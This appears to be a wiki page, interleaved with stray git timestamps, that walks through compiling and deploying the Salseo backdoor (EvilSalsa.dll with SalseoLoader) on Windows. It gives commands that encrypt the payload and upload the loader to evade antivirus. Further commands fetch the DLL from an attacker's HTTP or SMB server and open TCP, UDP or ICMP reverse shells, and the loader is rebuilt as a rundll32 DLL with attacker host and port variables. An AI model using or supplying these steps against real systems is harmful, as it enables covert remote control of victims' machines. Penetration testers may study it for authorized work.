2020-07-15 15:43:14 +00:00
---
2021-10-18 11:21:18 +00:00
description: https://github.com/Hackplayers/Salsa-tools
2020-07-15 15:43:14 +00:00
---
# Salseo
## Compiling the binaries
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader** . You will need **Visual Studio** installed to compile the code.
2021-10-18 11:21:18 +00:00
Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).
2020-07-15 15:43:14 +00:00
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in ** "Platform Target".**
2021-11-30 16:46:07 +00:00
**(**If you can't find this options press in ** "Project Tab"** and then in ** "\<Project Name> Properties"**)
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](../.gitbook/assets/image.png)
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
## Prepare the Backdoor
2021-11-30 16:46:07 +00:00
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**
2020-07-15 15:43:14 +00:00
### **Python**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.**
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
## **Execute the backdoor**
2021-10-18 11:21:18 +00:00
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
2020-07-15 15:43:14 +00:00
Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2021-10-18 11:21:18 +00:00
### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2021-10-18 11:21:18 +00:00
### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )****
2020-07-15 15:43:14 +00:00
#### **Disable ICMP Replies:**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### Execute the client:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
#### Inside the victim, lets execute the salseo thing:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
## Compiling SalseoLoader as DLL exporting main function
Open the SalseoLoader project using Visual Studio.
2021-10-18 11:21:18 +00:00
### Add before the main function: \[DllExport]
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 2 ) . png > )
2020-07-15 15:43:14 +00:00
### Install DllExport for this project
2021-11-30 16:46:07 +00:00
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 3 ) . png > )
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 4 ) . png > )
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
### **U**ninstall DllExport
2021-11-30 16:46:07 +00:00
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 5 ) . png > )
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
### **Exit Visual Studio and execute DllExport\_configure**
2020-07-15 15:43:14 +00:00
Just **exit** Visual Studio
2021-11-30 16:46:07 +00:00
Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport** ) and press **Apply**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 7 ) . png > )
2020-07-15 15:43:14 +00:00
### **Open the project again with visual Studio**
2021-11-30 16:46:07 +00:00
**\[DllExport]** should not be longer marked as error
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 8 ) . png > )
2020-07-15 15:43:14 +00:00
### Build the solution
2021-10-18 11:21:18 +00:00
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 10 ) . png > )
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 9 ) . png > )
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
2020-07-15 15:43:14 +00:00
### Test the generated Dll
Copy and paste the Dll where you want to test it.
Execute:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
If not error appears, probably you have a functional dll!!
## Get a shell using the Dll
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```